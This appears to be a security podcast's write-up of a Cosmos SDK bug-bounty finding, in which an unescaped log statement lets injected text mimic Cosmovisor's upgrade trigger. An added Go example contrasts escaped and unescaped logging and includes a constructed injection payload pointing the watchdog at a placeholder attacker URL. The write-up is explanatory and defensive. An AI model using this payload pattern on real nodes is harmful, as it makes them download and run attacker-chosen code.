Remote Code Execution and Denial of Service Vulnerability in Cosmos SDK with Cosmovisor (2500 USD)

We discussed this vulnerability during Episode 219 on 20 October 2023

Log injection is a class of bug that is often overlooked, both because it is difficult to spot during a black-box engagement and because the impact is difficult to determine. In this case the impact was easier to establish because the program consuming the logs was part of the same deployment. Cosmovisor, the process manager that wraps a Cosmos SDK node binary, watches the node's standard output, and certain log strings cause it to take action. Most interesting to the author was the upgrade trigger: a line announcing that an upgrade is needed, which can result in the watchdog downloading and executing a new binary. Functionality like that sounds dangerous on its face, so the author first set out to prove that a simple log injection was all that would be needed, by adding a deliberately vulnerable log statement to the node and confirming that the injected line was picked up.

Once the concept was proven it was time to hunt for an actually vulnerable log statement. Unfortunately most log statements escape the quote characters in the attacker-controllable part of the line (the key/value fields), and with the quotes escaped the watchdog would not recognize the trigger string. Ultimately the author did find one rather odd logging statement: it tried to print a message in the usual logger format, but instead of passing the key/value pairs as structured fields it formatted the whole thing into the message parameter. That parameter is not escaped, since it is normally a fixed string that an attacker cannot influence.
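To make the escaping point concrete, here is an added example (not code from the report or from Cosmos SDK/Cosmovisor) that models both sides: a watchdog scanning the daemon's output for an upgrade trigger, a structured logger that quotes caller-supplied values, and an unescaped message-style statement like the one described above. The trigger regex approximates the format such a watchdog looks for and is an assumption for illustration, as is the constructed attacker payload and its placeholder URL.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// upgradeRe approximates the trigger a Cosmovisor-style watchdog looks for in the
// node's output. Assumption for illustration; the real pattern may differ in detail.
var upgradeRe = regexp.MustCompile(`UPGRADE "(.*)" NEEDED at height: (\d+):\s+(\S*)`)

// Upgrade is what the watchdog extracts from a matching line.
type Upgrade struct {
	Name   string
	Height int64
	Info   string // the field a watchdog may treat as "where to fetch the new binary"
}

// ScanOutput plays the watchdog: it reads the daemon's output line by line and
// returns the first upgrade instruction it recognises.
func ScanOutput(output string) (Upgrade, bool) {
	sc := bufio.NewScanner(strings.NewReader(output))
	for sc.Scan() {
		if m := upgradeRe.FindStringSubmatch(sc.Text()); m != nil {
			h, err := strconv.ParseInt(m[2], 10, 64)
			if err != nil {
				continue
			}
			return Upgrade{Name: m[1], Height: h, Info: m[3]}, true
		}
	}
	return Upgrade{}, false
}

// SafeLog mimics a structured logger: the message is a fixed string and every
// caller-supplied value is emitted as key="value" with quotes and newlines escaped,
// so an injected trigger can neither match the pattern nor start a fresh line.
func SafeLog(msg string, kv ...string) string {
	var b strings.Builder
	b.WriteString("ERR ")
	b.WriteString(msg)
	for i := 0; i+1 < len(kv); i += 2 {
		fmt.Fprintf(&b, " %s=%s", kv[i], strconv.Quote(kv[i+1]))
	}
	b.WriteString("\n")
	return b.String()
}

// UnsafeLog mimics the odd statement described above: attacker-controlled text is
// formatted straight into the message, which is not escaped.
func UnsafeLog(format string, args ...any) string {
	return "ERR " + fmt.Sprintf(format, args...) + "\n"
}

// Payload is a constructed attacker-controlled string (think of a transaction memo).
// The leading newline tries to begin a fresh log line; the URL is a placeholder.
const Payload = "\nUPGRADE \"evil\" NEEDED at height: 100: https://attacker.invalid/evil.json"

func main() {
	safe := SafeLog("failed to process memo", "memo", Payload)
	if _, ok := ScanOutput(safe); !ok {
		fmt.Println("structured log: trigger not recognised")
	}
	vuln := UnsafeLog("failed to process memo: %s", Payload)
	if up, ok := ScanOutput(vuln); ok {
		fmt.Printf("unescaped log: watchdog would act on %q from %s\n", up.Name, up.Info)
	}
}
```

The structured line comes out as `memo="\nUPGRADE \"evil\" NEEDED ..."`, where the backslashes break the literal `UPGRADE "` the scanner needs; the unescaped line reproduces the trigger verbatim and the watchdog parses name, height and the attacker's URL out of it. The fix direction follows directly: never format untrusted input into the message, and keep it in quoted fields.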

Honestly this logging statement feels very odd to me, perhaps a remnant of older code from before the logging system added support for the nice printing of key/values, but regardless, it works great for an attacker who can inject a fake upgrade command into the output and get arbitrary code downloaded and run. It's a rather fun bug in my opinion and, as the author points out, while it is technically a Web3 bug, it feels very much like a more standard application security bug.